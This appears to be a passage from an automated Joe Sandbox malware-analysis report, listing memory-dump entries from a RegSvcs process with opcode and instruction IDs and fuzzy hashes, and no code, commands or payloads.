                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca45bca6f2b4d9e84956bdefb64a5947efa40bb6ad5f5af09ffaf57fc3ca89c5
                                                • Instruction ID: 0e30142fa25336d58e2fc19fb479c5da54fdb50e5667215300c5f62d0682244f
                                                • Opcode Fuzzy Hash: ca45bca6f2b4d9e84956bdefb64a5947efa40bb6ad5f5af09ffaf57fc3ca89c5
                                                • Instruction Fuzzy Hash: 2D31EF70B102058FDB69AB34D45866F7BA3FB89210F1085ACE402DB389DF30CE45EB95
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c2dafb89a0117806c227804388b7405c1d3a3003fb74a28490136382db5f556
                                                • Instruction ID: 211d02d1f1a955c2589979f18c64e78ada8108a2ae8acc1c07635f83940d191f
                                                • Opcode Fuzzy Hash: 2c2dafb89a0117806c227804388b7405c1d3a3003fb74a28490136382db5f556
                                                • Instruction Fuzzy Hash: A831C470E1030A9FDB15EF64C880A9EBBB6FF85300F108A69D401EB314EBB1E9468B41
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2443f22c64f631cd57c8f8def74d5903c3cea8704011c2c4f8f6dc341649e8d2
                                                • Instruction ID: 27e63c27eb6629d233d930d848fad4de29ac75b91143974eaa184fafefafac69
                                                • Opcode Fuzzy Hash: 2443f22c64f631cd57c8f8def74d5903c3cea8704011c2c4f8f6dc341649e8d2
                                                • Instruction Fuzzy Hash: AD31C070E102159FCB19EF64D854AAEBBF2FF89300F10855AE906EB350EB31AD42DB40
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18f8ff0bb127e9e95968a6b0d3f5631092c201134cd5194a03b0e3bb29a4df40
                                                • Instruction ID: 310044b8c686ed6370371226291d440c5268e1385eeaafdc528c47fdc927af49
                                                • Opcode Fuzzy Hash: 18f8ff0bb127e9e95968a6b0d3f5631092c201134cd5194a03b0e3bb29a4df40
                                                • Instruction Fuzzy Hash: 9631B070E102199FCB19EFA4D854A9EBBF2FF88300F108559E916EB350EB71AD46CB50
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cd13a1755eaeb080641f31f274179dcd4168fced7760e18b904aa7db969570a
                                                • Instruction ID: cbb09eed477aec7eb5da770231520f5989c144d7f3e2de59c046ef40879eac25
                                                • Opcode Fuzzy Hash: 8cd13a1755eaeb080641f31f274179dcd4168fced7760e18b904aa7db969570a
                                                • Instruction Fuzzy Hash: 69217C75F006199FDF10EFAAD850BAEBBF6BB48350F184169E945E7384E635D8018B90
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cbba3f130c1abcb24fd159e171936e50829c16f6de90b12e938ce0d8612b63ef
                                                • Instruction ID: 88901c3637111d0469d289692556f97c4ed7a40e3322ba8b42a90ed26dd48705
                                                • Opcode Fuzzy Hash: cbba3f130c1abcb24fd159e171936e50829c16f6de90b12e938ce0d8612b63ef
                                                • Instruction Fuzzy Hash: A8215AB5F006199FDB40EF6AD980BAEBBF5FB48350F144169E905E7380E635D9418B90
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3852493411.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_122d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aee29ccca95a1de5be72e2c713f0700baf819eeb7b2421bfbcecb63abb09e8b9
                                                • Instruction ID: 11a587c2e716783914f6ff2202008b2318b11ccec206c41f288a84040ab30120
                                                • Opcode Fuzzy Hash: aee29ccca95a1de5be72e2c713f0700baf819eeb7b2421bfbcecb63abb09e8b9
                                                • Instruction Fuzzy Hash: 68212271524308EFDB15DF94D9C0F2ABBA1FB88314F20C56DE9094B262C37AD947CA62
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 35275f893431b00af0edacb381db326597eaba8baeb60af24a0b8dd26839d737
                                                • Instruction ID: dc8e955128b64c671bdf808a33bb098e9e6c2b53052b373962d70eca6ee6d938
                                                • Opcode Fuzzy Hash: 35275f893431b00af0edacb381db326597eaba8baeb60af24a0b8dd26839d737
                                                • Instruction Fuzzy Hash: 1201F531B211101FDB65E66D9850B6BB7DBDBC9711F18846AF50EC7391EA21CC0243A2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd2ae445c79d35fb4abd33465e541eac7acba6d100aa08a027a11b52fb6857bc
                                                • Instruction ID: 5ad4832b30ea847acdb35b52a34e7e8f404160a6d015df2c1adf9b3e6c9e6298
                                                • Opcode Fuzzy Hash: cd2ae445c79d35fb4abd33465e541eac7acba6d100aa08a027a11b52fb6857bc
                                                • Instruction Fuzzy Hash: 7B11CE72F005288FCF64A67AE8246AE77EBFBC8310B044579C406E7344EA25CC028BD1
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 99d52f663bfbbf7e925d6790318752fb1eaac9360be2aafc2fe9b449f7462120
                                                • Instruction ID: 5e40a58e345bdb4d008d9877b89e564b14f85996f86cf1fa1a84209dd6182594
                                                • Opcode Fuzzy Hash: 99d52f663bfbbf7e925d6790318752fb1eaac9360be2aafc2fe9b449f7462120
                                                • Instruction Fuzzy Hash: 6A112870B122141FCB61F678D814BAB7BEAEB89711F1085A9F00BCB351DA24ED0283D1
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6dfbdde0ebfaa54f0247c753be1ae09b277e080723a14178e8d6b5acb6d4d0e4
                                                • Instruction ID: 1e83215a0ff83762fd65ad2568fa5d2307d1677e7b72e05583a5eabfd6af89f5
                                                • Opcode Fuzzy Hash: 6dfbdde0ebfaa54f0247c753be1ae09b277e080723a14178e8d6b5acb6d4d0e4
                                                • Instruction Fuzzy Hash: E901B176F210144FCF61B678E8517AF6AA7E7C8361F115576D50AD7340EB31CC128790
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a253e0b4f7310dff5ab922eb59d50504cf8921c344e6adcf9cebe4ddda129444
                                                • Instruction ID: 58cd92cb4899e82dc8aa432a5426e79ff49603405444fdc334459b031cb172cb
                                                • Opcode Fuzzy Hash: a253e0b4f7310dff5ab922eb59d50504cf8921c344e6adcf9cebe4ddda129444
                                                • Instruction Fuzzy Hash: BB01DF31B105101BDB65A63C9890B6F7ADBFBCA210F1084A9F10BC7381EF21DC0343A2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a953171ab0ca5c754e51e2c8bc3f0ff3203b6873b8147c8547ca25c4adff683f
                                                • Instruction ID: 3672c79c83d99ce8bf26ec12549f74593e767b8497f46f6f792549908f8000b0
                                                • Opcode Fuzzy Hash: a953171ab0ca5c754e51e2c8bc3f0ff3203b6873b8147c8547ca25c4adff683f
                                                • Instruction Fuzzy Hash: D101DE32F102285BDBA4A67EAC246EBB6EBEBC8310F040135D506D3345EA24880247D1
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6afd95db0c57ac4d8e56505bd41026d50b8e7f31bb0a7570231f35d18e7ac8aa
                                                • Instruction ID: 8a34e9861d79eed8442cc750131c3d0f6b88f2dfc137832ab5fe596f77e1d467
                                                • Opcode Fuzzy Hash: 6afd95db0c57ac4d8e56505bd41026d50b8e7f31bb0a7570231f35d18e7ac8aa
                                                • Instruction Fuzzy Hash: 1C2103B5D00219AFCB10DF9AD884ADEFBF8FB48314F10812AE918A7201C3796954CFA5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3852493411.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_122d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction ID: f1b7dee9a9cc68510be7db8d3c7499e18b6ef6d190a26f6f0340c18bbd3f6953
                                                • Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction Fuzzy Hash: 7111BB75504284DFCB16CF54D5C0B19BFA1FB88314F28C6AAD9494B666C33AD84ACB62
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2428fef8217f6a050d14f43e7f4722a22ea2abba1dee93032e97bf0c79266f34
                                                • Instruction ID: c0f32eb1eecd94749e2c60cafec41c54f6bc5bf37a3421e6638ad3059665d7ef
                                                • Opcode Fuzzy Hash: 2428fef8217f6a050d14f43e7f4722a22ea2abba1dee93032e97bf0c79266f34
                                                • Instruction Fuzzy Hash: 5411D0B5D01259AFCB10DF9AD884ADEFBF4FB48310F10812AE918A7200C379A944CFA5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5de64f0b6d3a42a7a02a6b4a2b70b1978e2a6246b627f054c7c7e936959555c
                                                • Instruction ID: 36e7e2873c0562f725040e4c745d5a3082fa0a70a8c7e718eb0061995a8d0778
                                                • Opcode Fuzzy Hash: d5de64f0b6d3a42a7a02a6b4a2b70b1978e2a6246b627f054c7c7e936959555c
                                                • Instruction Fuzzy Hash: 5801D131B200110BDB64A56E9490B2BB2DBDBC9720F28843AE50FC7344EE61DC0243A1
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 50424381cb934810541d3a219305b986a45ba487266f5efaeb083d727cb9c568
                                                • Instruction ID: 87d535c86cb2e4c9b4bac85619d8cf1b8630b834556fc2d6c4cd90db6d733c85
                                                • Opcode Fuzzy Hash: 50424381cb934810541d3a219305b986a45ba487266f5efaeb083d727cb9c568
                                                • Instruction Fuzzy Hash: EB01AF31B104105BDBA5A63C9890B2F76EBFBC9620F209879E10BC7340EE25DD035391
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4599d4e2f800aa8bf153c7c7d6ed440e2f19887ca81efa9648dc9dcb230651f1
                                                • Instruction ID: c21326dd46a86ce269db70494a4a5a80eee1a33adba33188344e9dead9df862c
                                                • Opcode Fuzzy Hash: 4599d4e2f800aa8bf153c7c7d6ed440e2f19887ca81efa9648dc9dcb230651f1
                                                • Instruction Fuzzy Hash: 97018C70B104144FDB61FA6CD854B6B73EAEBC9721F109968F50BCB354EA21EC028781
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca927a8833fd215a0a76f9c21abfa7b8ebf18bfc6162daa34f0aeba04249e6e7
                                                • Instruction ID: c76e814ef3ac279bfec6c83aaddaf6a95ffd1f2857ed1f9acc84f4fcef20619e
                                                • Opcode Fuzzy Hash: ca927a8833fd215a0a76f9c21abfa7b8ebf18bfc6162daa34f0aeba04249e6e7
                                                • Instruction Fuzzy Hash: 68E012B19206089BDF20EE65898976BB3EDE706308F5048A5D949C7201F633EA515780